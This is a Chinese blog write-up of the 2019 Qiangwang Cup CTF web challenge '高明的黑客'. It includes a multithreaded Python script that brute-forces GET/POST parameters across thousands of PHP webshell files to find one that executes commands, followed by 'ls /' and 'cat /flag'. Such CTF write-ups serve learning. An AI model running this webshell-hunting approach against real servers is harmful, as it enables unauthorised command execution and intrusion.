[强网杯 2019]高明的黑客(每日一题)

最新推荐文章于 2024-07-30 21:02:40 发布
最新推荐文章于 2024-07-30 21:02:40 发布
阅读量1k 收藏 1
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51684648/article/details/120167176
版权

[强网杯 2019]高明的黑客(每日一题)

1,打开网页,发现提示,下载文件

在这里插入图片描述

2,发现了三千多个php文件,打开几个文件,发现有可以传参的地方,尝试传参,但命令并没有被执行。

image-20210907195329564

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RfKq4Y6p-1631019565642)(https://i.loli.net/2021/09/07/yVeIzNdU5c8Ebar.png)]

3,猜测这三千多文件里有能被利用的shell,于是编写脚本尝试(我好菜,只能抄大佬们的脚本,在学了在学了)

threading.Semaphore():控制线程的最大数量
os.chdir():改变当前路径到指定路径
requests.adapters.DEFAULT_RETRIES():设置重连次数,防止线程过高,断开连接
os.listdir():返回指定文件夹包含的文件或文件夹的名字的列表
requests.Session():维持会话,可以让我们在跨请求时保存某些参数

import os
import requests
import re
import threading
import time

print('开始时间: '+ time.asctime(time.localtime(time.time()))) 
s1 = threading.Semaphore(100)
filePath = r"D:/phpstudy_pro/WWW/src/"
os.chdir(filePath)
requests.adapters.DEFAULT_RETRIES = 5
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False     //设置连接的活跃状态为False
def get_content(file):
    s1.acquire()
    print('tring  '+file+'   '+time.asctime(time.localtime(time.time())))
    with open(file,encoding='utf-8') as f:       //打开php文件,提取所有的get和post参数
        gets = list(re.findall('\$_GET\[\'(.*?)\'\]',f.read()))
        posts = list(re.findall('\$_POST\[\'(.*?)\'\]',f.read()))
    data = {}
    params = {}
    for m in gets:
        params[m] = "echo '123456';"
    for n in posts:
        data[n] = "echo '123456';"
    url = "http://127.0.0.1/src/" +file
    req = session.post(url,data=data,params=params)  //请求所有的get和post
    req.close()      //关闭请求,释放内存
    req.encoding = 'utf-8'
    content=req.text
    if '123456' in content:
        flag = 0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo '123456';")
            content =req.text
            req.close()
            if "123456" in content:
                flag = 1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b:"echo '123456';"})
                content =req.text
                req.close()
                if "123456" in content:
                    break
        if flag == 1:
            params = a
        else:
            params = b
        print('找到了利用文件: ' + file +"  and 找到了利用的参数:%s" %params)
        print('结束时间: '+time.asctime(time.localtime(time.time())))
    s1.release()

for i in files:
    t = threading.Thread(target=get_content,args=(i,))
    t.start()

4,跑完脚本,找到可利用参数
找到了利用文件: xk0SzyKwfzw.php and 找到了利用的参数:Efa5BVG
ls /
image-20210907205458074

5,发现flag文件,cat /flag

image-20210907205623579

YI_an#
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF [强网杯 2019]高明黑客
qq_42158602的博客
01-14 1089
根据提示在url/www.tar.gz拿到源码 随便打开几个看看 有很多shell 不过都是些不能用的 由于文件太多还是些脚本跑吧 (python3) import os import re import requests from multiprocessing import Pool filePath = "E:\phpstudy_pro\WWW\src" url = "http://1...
强网杯2019高明黑客&强网先锋上单)
kid的博客
05-30 5578
强网杯2019高明黑客&强网先锋上单)   前言 这里主要是对强网杯web中高明黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/read-5873.html   高明黑客 题目是先下载给出代码 比赛时拿到这道题一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK现在...
2024年网络安全最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,2024年最新网络安全面试你必须要知道的那些知识
2401_84302796的博客
05-12 857
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
[强网杯 2019]高明黑客
Sk1y的博客
03-26 3346
目录 解题过程 1. 一个简单的exp 2. python 多线程简单实例 3. 一个低配版的exp 4. 高配版 参考链接: 考点:本题目考查的是编写脚本的能力,从中学到了许多。 解题过程 打开题目后,是这样的,显示网站被黑,但是说明了源码的位置 访问/www.tar.gz ,发现这个源码有近40MB!!! 没办法,下载吧。 下载之后,发现里面有3002个项目,只有一个是index.html,其余都是php文件。并且每个php文件都有若干个一句话木马,这个不可能一个一个试,.
【BUUCTF】[强网杯 2019]高明黑客
aoao331198的博客
04-26 2318
拿到的源码有3000多个文件,所有文件都是杂乱的 网上wp感觉对题目的理解部分讲解较少,结合蚁剑工具,我觉得题目意思像是说这里面的文件是一句话木马,我们要找到合适的GET或POST参数能执行shell命令。 用脚本暴力跑完所有文件的所有参数,技术不行,只能贴别人的代码 import os import requests import re import threading import time print('开始时间: '+ time.asctime( time.localtime(time.ti.
[强网杯 2019]高明黑客 1
plant1234的博客
06-02 592
2019强网杯_web_高明黑客
fly夏天的博客
10-22 1445
之前参加了2019强网杯,当时表现很菜,很多题都不会做。 后来发现buuoj.cn上有复现,以此重新复现一下这次的题目。 话不多说,开始今天的主题。 一访问页面就是如下画面: 因此我们直接访问 url/www.tar.gz即可下载获得源码。 打开压缩包,发现有3000多个php文件。 尝试搜索flag文件,未果。 打开php文件进行代码审计 发现代码中存在一些诸如这样的get或post参数会执行...
[强网杯 2019] web题-高明黑客
BROTHERYY的博客
07-08 1016
复现环境:buuoj.cn 下载下来的源码很大,大到让人傻掉 看了下大佬的wp 是说找出这些源码中所有的GET和POST请求,模拟请求一遍,看看那个能RCE能够使用。 这里贴出赵师傅的Python脚本 膜一波 import os import threading from concurrent.futures.thread import ThreadPoolExecutor import requests session = requests.Session() path = "/Users/ji
BUUctf 刷题之[强网杯 2019]高明黑客 1
dwrnxjlove的博客
08-09 882
[强网杯 2019]高明黑客 1 打开题目之后是一段简单的话: 提示到网站的源码在www.tar.gz里,于是访问,下载网页源码,下载之后发现并不是网页源码,解压下载的文件发现里面有3000多个php文件,于是用D盾粗扫了一遍,发现全是报后门文件,但是尝试利用,发现前面一个文件都不能用,但是这3000多个文件必然有可以用的,于是就尝试进行文件遍历,找出可以利用的文件: 附上自己的脚本: import re import os import requests files = os.listdir(r'C
web buu [强网杯 2019]高明黑客1
weixin_44214568的博客
03-30 347
考点:脚本编写 1.根据提示,查看源码 url+www.tar.gz,下载压缩包,发现是3002个php文件 随便打开一个发现里面有传参$_GET()函数,里面有的直接接了eval,相当于直接执行了参数里面的值,但是经过审计代码发现,里面的很多参数都已经在代码里被赋值,所以我们需要从三千多个文件里找到有用的$_GET(),很显然通过人工寻找有一定难度,那么就需要我们编写脚本 ...
[强网杯 2019]随便注.docx
12-18
强网杯 2019】SQL 注入详解 SQL 注入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 注入题目。首先,通过尝试...
【BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜...得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
2019 第三届强网杯线上赛.zip
12-17
强网杯
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
RCE和php文件上传
最新发布
m0_71332744的博客
07-30 703
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 215
【代码】53、PHP 实现归并排序。
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 376
WordPress原创插件:搜索引擎抓取首图seo图片。
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决注入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便注这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL注入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便注是一道涉及注入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值